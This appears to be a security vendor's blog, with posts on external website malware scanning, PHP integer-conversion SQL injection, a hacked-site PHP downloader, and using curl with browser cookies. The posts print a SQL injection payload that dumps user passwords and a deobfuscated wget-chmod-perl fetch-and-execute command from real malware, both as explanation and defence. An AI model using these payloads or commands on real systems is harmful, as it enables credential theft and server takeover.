Monday, July 23, 2012

Food for Thought: Does locally installed antivirus solves your website problems?

If you are a website owner that knows nothing about network and security; this post is for you! In this post we would describe briefly classical security vulnerability and observe the difference between local and external antivirus scanning.

How does a web-server works for us?

When you type the following url on your browser address bar,
 few things happens just before you see the text and images.
  • The browser connect to and “say”: “hey: can I have /articles/cooking” 
  • server “looks” (mostly in a database) and reads all the cooking articles  
  • then the server wraps up all the information in a browser native language (yap! that’s HTML)  
  • sends to the browser

Let’s say a users wish to post a comment.
  • The browser connect to and “say”: “hey: Can you store “THE VISITOR COMMET” under /articles/cooking”
  • server stores the comment in the database and tag it under cooking articles
  • then the server wraps the page content in HTML
  • sends it to the browser. 
So far everything looks fine and normal, so what is the problem?

What if the comment a user just posted to /articles/cooking looks like that: **********************************************************************************
 “I just found another article using a completely different approach bla bla…… Take a look at“ ← malicious site ********************************************************************************** 

 So the comment is now stored in the database and your local antivirus should detect it, right?
Well, probably not, there are plenty of databases out there with different formats that your local antivirus cannot read, also the comment might be stored encrypted to prevent local antivirus detecting it.

That’s the magic of external antivirus scanning, it sees your website exactly the same way as your users do (like opening the website on a browser), it doesn’t matter anymore where and how the comment is stored in the database, if it out there on your website the external antivirus will detect it. Simple yes, but it works like a charm :-)

Saturday, August 6, 2011

PHP Security: Automatic Integer Conversion

Hello All

This time I would like to cover security bug that I have seen today while doing some tests with our security scanner. We have added special signatures to our ZeroDayScan web security scanner to check for such bugs. In brief PHP has another method that can be used to perform SQL injections. This is not widely known bug for PHP community.

PHP is very popular language used in a lot of websites. PHP uses variables that can store numbers and integers at once.

If you compare PHP variable with a constant number, PHP will automatically performs conversion of that variable to an integer.

So when the following code is executed:

$my_var = $_GET['my_var'];
if ($my_var == 1)

$my_var variable is automatically converted to an integer. This is indeed very useful. It is probably because in the background PHP uses atoi() C library function. This atoi() function has very interesting feature. If after the number you will have some text like "1abc", this function will return just 1 without generating any error message.

So, in brief, if you compare "1abc" to 1 it will be true and the code will continue to the nested block of code.

So if we will get back to our code

if ("1abc" == 1)
// this code will be executed now

So, here comes the security issue. In the nested block the $my_var will still has the old value "1abc". As a result it is unsafe to use it for example when executing SQL query because it can contain SQL injection.

$pageid = $_GET['pageid'];
if ($pageid == 1)
$result = mysql_query("SELECT title, content from pages where page_id = $pageid");

Because $pageid can contain SQL query starting with number 1 it will be glued with a legitimate query.

$pageid can contain the following code: "1 union select user, password from accounts".

As a result the following code will be executed:
$result = mysql_query("SELECT title, content from pages where page_id = 1 union select user, password from accounts");


1. Scan your code with our security scanner to find such bugs. It is better to scan your code in every step of your coding. Here is a link:

2. Instead of $pageid = $_GET['pageid'] use the following code:

$pageid = intval($_GET['pageid']);

3. You can use GreenSQL database firewall to protect your database from not legit queries. You can get GreenSQL Express for free. You can get it from here:

Best regards,
Yuli Stremovsky

Tuesday, July 26, 2011

Casper Downloader gets shell access

One of our clients got hacked and we urged to help him to identify the security issue that the black hat hacker discovered to break into his website.

This specific customer had some outdated software that allowed the users to upload arbitrary files. The fraudster used that script to upload PHP script on his website and got control over the website. After that, this PHP script downloaded IRC bot written in Perl and from now on the server can receive commands from some IRC server.

We called this PHP script as Casper downloader because of the word "Capsper" appeared in one of the first line in the file.

Here is a code of this PHP downloader:

As you can see in the print screen the script executes a number of cryptic shell commands. After de-obfuscation, it runs the following command:

wget -O sess_sd54t4fg85gdgh58; chmod 755 sess_sd54t4fg85gdgh58; perl sess_sd54t4fg85gdgh58*

Here is how it works:
  1. Download txt file from .
  2. Rename the file to sess_sd54t4fg85gdgh58
  3. Add executable permission to the above file
  4. Execute the script using the perl: perl sess_sd54t4fg85gdgh58

This shell commands are executed using number of PHP exec() function variations (it is done in case one of the PHP commands is blocked). Instead of exec() the following commands were also used: shell_exec(), system(), passthru().

The above txt file is basically Perl IRC bot. This bot has a number of built in commands. For example it can perform port scan. It is done using the following Perl code

In addition this IRC bot can execute shell commands and return the results to the channel operator and open remote shell on the server.

Thursday, March 31, 2011

Using curl to download password-protected pages

We are rebuilding one of our sites witch was used as a blog in the past. We decided to republish one of it's posts here.

Sometimes, for the research we need to download massive amounts of content from password-protected websites. It can be done manually using Internet Explorer, though it becomes a problem when downloading large amounts of pages. Manually, it is a tedious task, which can be completely automated.

Automating the download process of massive content

For my work, I use the following tools: firefox and curl. Both of these tools are available for Windows and Linux. Curl is a web page downloading tool. It is similar to the well known wget tool. I guess I do not need any words for Firefox. I can say that it is much better alternative to Internet Explorer.

Basically, establish a session with the password-protected website using Firefox. Use the resulting cookie in a standalone curl application to fetch website pages.

Step 1. (optional) Clean Cookies.

Clean all cookies to reduce load as follows: Firefox Menu -> Tools -> Clear Private Data. The Clear Private Data window appears. Select the Cookies checkbox as follows:

Step 2. Log in to the website.

Go to password-protected website and fill in your username and password and login.
For example,

Step 3. Getting the cookie.

Open Firefox Preferences Window and select the Privacy tab in Firefox Menu -> Edit -> Preferences -> Privacy tab:

Next, click the Show Cookies button. Select the required website and open the
Cookie window.

Pay attention to the cookie's name and the content fields, we will use them in the next step.

Step 4. Create the cookie container.

Cookie container is a special file used to store cookie values. curl can use this file to get access to your established session (you have signed in to the website, right?).

Open your favorite text editor and create the cookie.txt file: FALSE / FALSE 0 cookie-name cookie-content

All fields must be separated by tabs.

For example: FALSE / FALSE 0 PHPSESSID a571d80ccf683df8da9031ada698336e

Step 5. Download the website.

We are almost done! Download the required pages. Run the following command:
curl --cookie-jar cookie.txt -b cookie.txt

The cookie prompts the website to accept you as a legitimate user!

Now you can continue to download all required content by running the shell command.
For example,
Command for downloading GreenSQL database names:

* curl --cookie-jar cookie.txt -b cookie.txt
* curl --cookie-jar cookie.txt -b cookie.txt
* curl --cookie-jar cookie.txt -b cookie.txt

Friday, October 15, 2010

Website Virus Detection

Today I would like to tell you about a new and exciting feature that we have added to the scanner – Website Virus Detection. ZeroDay web security scanner now is able to identify malware urls in the scanned websites. Some of the ulrs, especially the ones crafted with iframe HTML tag, are opened in automatic way. So, if a user visits this page, his browser will be under attack. It happens because a virus is loaded from the malware url. In other cases, site visitor needs to clicks on malicious url. As a result his browser will be under attack by a computer virus.

In addition to the fact that site visitors can be infected by computer viruses, the website itself can be removed from search engine results. Modern search engine has a capability to look for such malicious urls inside HTML pages. If malware url is found by search engine, it can block access to the legitimate website.

If a malware url is found in your website, you should clear all the pages reported. Make sure that this malware urls does not appear in other pages and not only in reported ones.

ZeroDayScan collects these malware urls from a number of resources. For example from Zeus tracker project

How the website get infected with a virus/malware url ?

Fraudsters are using automated tools to infect websites with malware urls. There are 3 types of tools that we are aware. It is possible that there are some more variants.

Automatic form submitters

Fraudsters are using automated tools to post links as a comment spam. These are the same tools used by the black hat seo people to spam links across thousands of websites. These tools can be very smart. Some of them are able to break capthas in automatic way. There are some ways to combat with these tools. Some online services exist that analyze comments submitted by users and block spam submissions.

Automatic Ftp Exploiter

These tools are very smart in the way they operate. They break ftp passwords or exploit bugs in ftp servers. Once an access is achieved, these tools look for index pages. For example index.php, index.html, default.html, etc… These tools add an IFRAME link in the bottom of the file infected. All JavaScript files are also changed in the same way – they look for files with .js extension and add malware url in the bottom of the file. You can perform a number of steps to minimize possibility that your website will be infected using this tool: always update your software, use strong passwords for ftp users, do not host your website in shared hosting, use ftp alternatives – for example ftp over ssh.

Automatic SQL Injector

These tools look for SQL injections inside website and automatically change data to include malicious urls. So if a website script shows data from a table that has malware url added to every record, these urls are displayed to the site visitor. As a result, user’s computer is under attack by computer virus loaded from the malware url. Very known example of such activity is Asprox virus. This virus exploited sites that store data in Microsoft SQL Server. To protect from such attacks it is recommended to install database firewall like greensql database firewall.

Best regards,
ZeroDayScan team

Saturday, July 3, 2010

Number of connection errors

Hello All

We are constantly adding new features to our scanner. This time we would like to discuss our new feature that is important for all ZeroDayScan users. Our new reports contain a number of connection errors printed in the report summary. For example take a look at the following print screen.

This connection error number specifies number of cases when our web security scanner had a problem performing a web site assesment request. If this number is big, it means more connection errors and as a result not all pages are scanned. It can happen due to a number of reasons. For example:

- Some website these days are protected using different web application firewalls (WAF). If this WAF solution detects a number of assessment attacks coming from the ZeroDayScan server, the original IP can be blocked after few assesment attempts.
- Some web applications have build-in flood protection. For example Joomla CMS has one. If the number of requests coming from the same IP is too big, this IP will be blocked.
- Hosting companies are running network Intrusion Prevention Systems (IPS). If an IPS solution detects port scan coming from ZeroDayScan IP address, the original IP can be blocked.

Most important thing to note is that we are working on a mechanism that will eliminate all connection errors. Our new version will be released soon. Stay tuned...

Best regards,
ZeroDayScan team

Tuesday, June 1, 2010

Great review by

We have great news for all our users.

Our web security service was just reviewed by the leading blog covering the hottest start-ups over the internet.

Here is a direct link to the review page:

Vote for us and spread the world about our service!